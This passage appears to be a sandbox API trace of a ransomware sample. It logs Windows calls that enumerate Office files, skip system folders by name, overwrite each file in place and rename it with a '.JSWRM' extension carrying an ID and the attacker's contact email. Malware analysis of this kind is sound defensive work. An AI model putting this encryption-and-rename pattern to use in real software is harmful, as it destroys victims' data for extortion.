returned 5 [0130.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.425] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2238) returned 1 [0130.425] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.425] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x8b0, lpOverlapped=0x0) returned 1 [0130.427] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.427] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x8b0, lpOverlapped=0x0) returned 1 [0130.427] CloseHandle (hObject=0x314) returned 1 [0130.427] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smss.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SMSS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\smss.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.428] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x300, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASK.CFG", cAlternateFileName="")) returned 1 [0130.428] lstrcmpiW (lpString1="TASK.CFG", lpString2=".") returned 1 [0130.428] lstrcmpiW (lpString1="TASK.CFG", lpString2="..") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="...") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="windows") returned -1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="recovery") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="perflogs") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="documents and settings") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="system volume information") returned 1 [0130.429] lstrcmpiW (lpString1="TASK.CFG", lpString2="msocache") returned 1 [0130.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASK.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASK.CFG", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASK.CFG", lpUsedDefaultChar=0x0) returned 8 [0130.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASK.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASK.CFG", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASK.CFG", lpUsedDefaultChar=0x0) returned 8 [0130.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\task.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.430] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=768) returned 1 [0130.430] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.430] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0130.431] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.431] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0130.431] CloseHandle (hObject=0x314) returned 1 [0130.432] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\task.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASK.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\task.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.432] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKACC.CFG", cAlternateFileName="")) returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2=".") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="..") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="...") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="windows") returned -1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="recovery") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="perflogs") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="documents and settings") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="system volume information") returned 1 [0130.433] lstrcmpiW (lpString1="TASKACC.CFG", lpString2="msocache") returned 1 [0130.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACC.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACC.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKACC.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACC.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACC.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKACC.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskacc.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.434] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=804) returned 1 [0130.434] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.434] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x320, lpOverlapped=0x0) returned 1 [0130.436] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.436] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x320, lpOverlapped=0x0) returned 1 [0130.436] CloseHandle (hObject=0x314) returned 1 [0130.436] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskacc.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACC.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskacc.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.437] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKACCL.ICO", cAlternateFileName="")) returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2=".") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="..") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="...") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="windows") returned -1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="recovery") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="perflogs") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="documents and settings") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="system volume information") returned 1 [0130.437] lstrcmpiW (lpString1="TASKACCL.ICO", lpString2="msocache") returned 1 [0130.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKACCL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKACCL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.437] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskaccl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.439] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.439] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.439] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.440] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.440] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.440] CloseHandle (hObject=0x314) returned 1 [0130.440] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskaccl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACCL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskaccl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.441] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKACCS.ICO", cAlternateFileName="")) returned 1 [0130.441] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2=".") returned 1 [0130.441] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="..") returned 1 [0130.441] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="...") returned 1 [0130.441] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="windows") returned -1 [0130.441] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="recovery") returned 1 [0130.442] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="perflogs") returned 1 [0130.442] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="documents and settings") returned 1 [0130.442] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.442] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="system volume information") returned 1 [0130.442] lstrcmpiW (lpString1="TASKACCS.ICO", lpString2="msocache") returned 1 [0130.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKACCS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKACCS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKACCS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskaccs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.443] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.443] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.443] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.445] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.445] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.445] CloseHandle (hObject=0x314) returned 1 [0130.445] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskaccs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKACCS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskaccs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.446] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x327, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKDEC.CFG", cAlternateFileName="")) returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2=".") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="..") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="...") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="windows") returned -1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="recovery") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="perflogs") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="documents and settings") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="system volume information") returned 1 [0130.446] lstrcmpiW (lpString1="TASKDEC.CFG", lpString2="msocache") returned 1 [0130.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDEC.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDEC.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKDEC.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDEC.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDEC.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKDEC.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.447] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=807) returned 1 [0130.447] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.447] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x320, lpOverlapped=0x0) returned 1 [0130.450] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.450] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x320, lpOverlapped=0x0) returned 1 [0130.450] CloseHandle (hObject=0x314) returned 1 [0130.450] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdec.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDEC.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdec.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 